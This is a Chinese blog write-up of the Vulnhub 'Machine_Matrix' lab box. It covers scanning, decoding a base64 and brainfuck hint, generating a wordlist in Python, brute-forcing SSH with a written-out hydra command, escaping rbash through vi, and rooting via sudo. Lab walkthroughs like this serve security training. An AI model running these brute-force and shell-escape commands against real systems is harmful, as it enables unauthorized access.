Machine_Matrix 靶机

最新推荐文章于 2024-06-14 09:16:11 发布
最新推荐文章于 2024-06-14 09:16:11 发布
阅读量58 收藏
点赞数
分类专栏: 渗透测试 文章标签: 网络安全 安全威胁分析 服务器 linux web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51559599/article/details/134160186
版权

Machine_Matrix

信息搜集

存活检测

image-20231101124718365

详细扫描

image-20231101124736978

后台网页扫描

image-20231101124729186

网页信息搜集

80 端口未发现有用信息

image-20231101124921443

访问 nmap 扫描出的 http 31337 端口

image-20231101125354709

在源码中发现了一串密文

ZWNobyAiVGhlbiB5b3UnbGwgc2VlLCB0aGF0IGl0IGlzIG5vdCB0aGUgc3Bvb24gdGhhdCBiZW5kcywgaXQgaXMgb25seSB5b3Vyc2VsZi4gIiA+IEN5cGhlci5tYXRyaXg=

image-20231101125425331

base64 解密

image-20231101125523778

echo "Then you'll see, that it is not the spoon that bends, it is only yourself. " > Cypher.matrix

像是输出了一句话到 Cypher.matrix 文件中

禅师访问 Cypher.matrix 文件

image-20231101125711661

brainfuck 解密

image-20231101125856267

You can enter into matrix as guest, with password k1ll0rXX

Note: Actually, I forget last two characters so I have replaced with XX try your luck and find correct string of password.

说可以用 guest 用户登录,密码是 k1ll0rXX,但是少了最后两位

ssh 登录

编写 python 脚本,生成密码本

import string
all_chars = string.ascii_letters + string.digits
with open("./password.txt","w") as f:
    for i in all_chars:
        for j in all_chars:
            f.writelines("k1ll0r" + i + j+"\n")

image-20231101134511743

hydra 爆破 ssh

hydra -l guest -P password.txt ssh://10.4.7.162 -vV -f  -I -t 64

image-20231101134528843

成功爆破出密码

k1ll0r7n

image-20231101135209683

ssh 登录

ssh guest@10.4.7.162

image-20231101135406385

提权

sudo -l 查看 root 权限,受到 rbash 命令限制

image-20231101135938317

按 Tab 键查看可使用的命令

image-20231101140025983

vi 绕过 rbash 限制

# vim/vi进入之后
:set shell=/bin/sh # 或者用/bin/bash
# 将当前 shell 的默认 shell 设置为 /bin/sh
:shell
# 
 
# 切换完成之后还要添加环境变量。给$PATH变量增加两个路径,用来查找命令
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin/

sudo -l 查看 root 权限

image-20231101140605226

该用户拥有全部权限

直接 sudo bash 提权成功

image-20231101140920149

gjl_
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
HTB HARD 靶机 Cerberus WriteUp
qq_58869808的博客
03-26 7999
HTB Cerberus hard!!!靶机writeUp
web Machine(n7) 靶场实录
gaopan2667002的博客
09-01 188
反馈了一个flag 靶机的最终目的应该就是找到flag 本以为flag已经找到 到此结束,后来翻看了相关的攻略内容 发现这个flag只是其中的一半。后来查看时间盲注的内容,尝试了一下,send的时候sleep(5)执行了,并且等待了5秒页面才进行刷新。多了一个254的IP,查看了一下本机状态,除了kali以外就只有这个虚拟机是打开的。使用简单的tomcat字典爆破尝试,本机运行内存很小,速度很慢,所以没有选择大的字典。后来查看了虚拟机管理器的IP配置才想起来网段配的是56,并非之前一直使用的233。
Machine_Matrix靶机渗透测试
weixin_49340699的博客
06-17 315
Machine_Matrix靶机渗透测试 环境 kali, 靶机 工具 kali自带netdiscover,hydra,crunch,nmap,dirb,以及一些解码工具 主机发现及端口扫描 用netdiscover对内网进行扫描发现目标主机 netdiscover -i eth0 -r 192.168.19.0/24 然后用nmap对目标主机进行端口扫描 nmap -sV 192.168.19.132 发现开启了22 ssh 服务和80端口和一个未知的31337端口 直接访问80端口查看源码没有任
记一次完整的渗透测试(Machine_Matrix)
qq_62729556的博客
11-13 128
接下来进行flag查询,找了半天没找到,切换到超级管理员用户下时失败了,这个时候想到缺少环境变量,接下来增加环境变量,由于不清楚具体在哪个环境变量下,索性就将所有环境变量加入,成功进入超级管理员下,再进入到root目录下,成功找到flag。1. 权限限制:-rbash是一种受限制的shell,它提供了一些额外的安全限制,以防止用户执行一些危险的操作。通过探测得到的端口,访问80端口,发现什么都没有,这个时候尝试访问31337端口,发现出现了别的信息,通过查看源码发现了一段base64加密的信息。
vulnhub靶场,Machine_Matrix1
kukudeshuo的博客
08-18 293
vulnhub靶场,Machine_Matrix1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/matrix-1,259/ 攻击机:kali(192.168.109.128) 靶机Machine_Matrix1(192.168.109.164) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 确定目标靶机IP地址为192.168.109.164 使用n
Vulnhub靶机实战——Matrix3
冠霖L的博客
11-15 853
下载地址: https://download.vulnhub.com/matrix/Machine_Matrix_v3.ova 环境: VMware 15虚拟机软件 Matrix3靶机IP地址:192.168.220.160 Kali的IP地址:192.168.220.155 Matrix3靶机与kali都以NAT模式连接到网络,查看kali的IP地址:192.168.220.155 ip add...
Machine_Matrix1 渗透提权
猎荒者
12-15 412
前言 随笔一篇,用于记录,留下心得。 1.1 环境 ① 攻击机:Kali ② 靶机Machine_Matrix 1.2 渗透实战 1.2.1 信息收集 ifconfig 查看攻击机 Kali IP,以确定待会要扫描的网段 ① 发现主机 命令:netdiscover -r 192.168.11.0/24 说明:192.168.11.136 是我另一台虚拟机的IP 由此可以得出 Machine_M...
vulnhub靶机实战——Matrix_1
冠霖L的博客
10-31 1069
环境:Vmware 15 Kali:192.168.150.129 Matrix靶机:192.168.150.130 1、 发现主机 Matrix靶机、Kali添加至“仅主机模式”,查看Kali的IP地址为:192.168.150.129 使用nmap扫描192.168.150.0/24网段发现靶机IP地址:192.168.150.130 nmap -sP 192.168.150.0/24 -oN...
Vulnhub靶机——Matrix3
2301_76786857的博客
07-02 99
使用chmod命令为id_rsa.pub添加可执行权限,可以让trinity用户使用,使用trinity用户将生成的id_rsa.pub复制到trinity家目录下。使用sudo -l查看可以使用guest用户使用的sudo命令,发现可以以trinity用户无密码使用/bin/cp命令。查看data文件的文件类型,是一个Windows下的文件,但是在这里遇见了问题,没有找出data文件中隐藏的内容。在Matrix/n/e/o/6/4/目录下发现一个secret.gz文件,应该是一个提示。
t6AdmX_new靶机
08-03
t6AdmX_new靶机
MyOA.rar_easy _myoa_myoa靶机_oa_ssh mysql 框架
09-24
一个OA项目,框架SSH 数据库是;mysql 前端是easy UI
新版PHPStudy可用sqli_labs 靶机.zip
03-01
在新版PHPStudy中可以使用的sqli_labs SQL注入靶机。 直接解压压缩包,然后把安装包放在WWW根目录下。 找到\phpstudy_pro\WWW\Sqli_Edited_Version-master\sqlilabs\sql-connections找到这个目录下的db-creds.inc ...
安装部署Web安全测试用的靶机
11-24
个人作业,希望有所帮助
hack me please靶机攻略.docx
10-19
"hack me please靶机攻略" 本资源为一份详细的靶机攻略文档,涵盖了从主机发现到获取 root 权限的整个过程。下面是从文档中提取的关键知识点: 一、主机发现 * 使用 nmap 工具进行主机发现和端口扫描,命令为:...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8287
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
强敌环伺:金融业信息安全威胁分析——整体态势
AKAMAI_CHINA的博客
01-29 1041
Web应用程序和API攻击、零日漏洞以及DDoS攻击等方面,金融服务业一直是最主要的三大被攻击目标垂直行业之一。金融服务业的Web应用程序和API攻击数量同比激增3.5倍,在所有主要行业中增速最快。如何阻止Web应用程序和API攻击利用新发现的零日漏洞针对金融服务业发起的攻击,在24小时内就可以轻松达到每小时数千次的规模,并且会快速达到峰值,这使得防御者几乎没时间打补丁或做出反应。
nc网络收发测试-tcp客户端\TCP服务器\UDP\UDP广播
最新发布
06-14 255
nc网络收发测试-tcp客户端
百度网盘限速解决办法
生活在别处
06-13 1979
比如可以获取下载直链后,使用IDM(Internet Download Manager)对该直链进行多线程下载,但是并不会有实际速率提升效果,因为百度网盘在服务器端进行了限速,多线程的速率总和被限制在了100KB/s左右。(现在虽然是所谓玩游戏获得会员下载体验,实际上点击后会在百度网盘内打开一个web游戏,并不需要游玩游戏,直接等待会员下载体验时间结束即可关闭web游戏窗口)所以,客户端这些改动伎俩通通没有实际效果,即使在客户端显示无限速、显示会员体验,都只是自欺欺人而已。
doubletrouble靶机
08-29
doubletrouble靶机是一个用于渗透测试和漏洞挖掘的目标。它有两个不同的靶机地址。第一个地址是https://download.vulnhub.com/doubletrouble/doubletrouble.ova,可以下载一个ova文件来部署虚拟机。第二个地址是https://www.vulnhub.com/entry/doubletrouble-1,743/,可以获取更多有关靶机的描述信息。靶机中包含一个名为"doubletrouble"的数据库,其中有一个名为"users"的表。你可以使用sqlmap等工具对该表进行爆破和数据挖掘操作。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [vulnhub靶场-DoubleTrouble](https://blog.csdn.net/qq_42947816/article/details/125739402)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [靶机渗透练习63-doubletrouble](https://blog.csdn.net/Perpetual_Blue/article/details/124289479)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

gjl_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值